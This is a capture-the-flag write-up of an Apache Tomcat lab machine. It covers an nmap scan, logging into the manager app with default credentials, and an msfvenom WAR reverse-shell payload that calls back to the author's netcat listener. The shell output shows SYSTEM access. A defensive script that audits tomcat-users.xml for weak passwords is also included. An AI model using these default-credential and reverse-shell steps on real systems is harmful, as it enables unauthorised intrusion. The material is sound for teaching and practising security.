This was a straightforward and really easy box: a web application for practising the fundamentals of hacking, which makes it perfect for someone new to the field.
We start with a service scan to discover open ports, services and applications running in the background, so that we know the infrastructure and any hidden services of interest that might let us disclose information or gain a foothold.
```
$ nmap -A -p-65535 jerry
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 05:22 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.40% done
Nmap scan report for jerry (10.10.10.95)
Host is up (0.049s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
```
We're greeted by a Tomcat index page.
Nmap reports that a proxy might be redirecting requests, so I ran the web application through a Burp proxy and found something interesting in the response body:
```html
<h3>Managing Tomcat</h3>
<p>For security, access to the <a href="/manager/html">manager webapp</a> is restricted. Users are defined in </p>
<pre> $CATALINA_HOME/conf/tomcat-users.xml </pre>
<p>
```
Additionally, I ran a directory brute force to discover hidden directories that could be used to our advantage.
Browsing to the discovered /manager directory prompts for credentials. Cancelling the browser's authentication dialog (Firefox or Chrome) returns Tomcat's 401 page, which shows an example tomcat-users.xml entry with default credentials.
Entering those example credentials into the authentication prompt works: the manager application was left with its default credentials, and we are logged in.
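As an added defender-side check, and not part of the original writeup, the script below audits a tomcat-users.xml (the file the Tomcat index page points at) and flags every manager-capable account whose password is one of Tomcat's own example values or is trivially weak. The sample file and the list of example passwords are constructed for this illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of $CATALINA_HOME/conf/tomcat-users.xml
# (not taken from any target); two accounts still carry weak passwords.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="ops" password="Zq9!vL2#pR8wT4xC" roles="manager-gui,manager-status"/>
</tomcat-users>
"""

# Placeholder values that appear in Tomcat's own example configuration and
# documentation; a live account still using one of them is a misconfiguration.
KNOWN_EXAMPLE_PASSWORDS = {"tomcat", "s3cret", "admin", "password", "changeme"}
# Roles that grant access to the manager/host-manager webapps (and WAR deployment).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}

def audit_tomcat_users(xml_text: str) -> list:
    """Return one finding per manager-capable user with an example or weak password."""
    findings = []
    # The file declares a default namespace, so compare on the local tag name.
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        username = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & MANAGER_ROLES
        if not privileged:
            continue  # an unprivileged account cannot reach the manager app
        reasons = []
        if password in KNOWN_EXAMPLE_PASSWORDS:
            reasons.append("password is a well-known Tomcat example value")
        if password.lower() == username.lower():
            reasons.append("password equals username")
        if len(password) < 12:
            reasons.append("password shorter than 12 characters")
        if reasons:
            findings.append({"username": username,
                             "roles": sorted(privileged), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['username']} [{', '.join(f['roles'])}]: {'; '.join(f['reasons'])}")
```

If the realm is configured with a CredentialHandler the stored values are digests rather than plaintext, and the text comparisons above no longer apply.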
In another hacking writeup, I remember exploiting the WAR file upload functionality to gain a shell. Here I am using msfvenom to create a file which, when executed, opens a reverse shell connection to my netcat listener.
```
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war -o thebigslap.war
Payload size: 13319 bytes
Final size of war file: 13319 bytes
Saved as: thebigslap.war
```
Open a netcat listener to catch the connection that comes back once we deploy and open the WAR file.
```
$ nc -nvlp 1234
listening on [any] 1234 ...
```
Upload the WAR file and click the deploy button. It should then appear in the applications list on the manager's main page. Click on it to open the file, then check netcat for the incoming connection. Below I show that the shell runs with SYSTEM privileges:
- “The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows”
```
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```
```
C:\Users\Administrator\Desktop\flags>type *
type *

2 for the price of 1.txt

user.txt
<FLAG:7004dbc...deleted>

root.txt
<FLAG:04a8b36...deleted>
```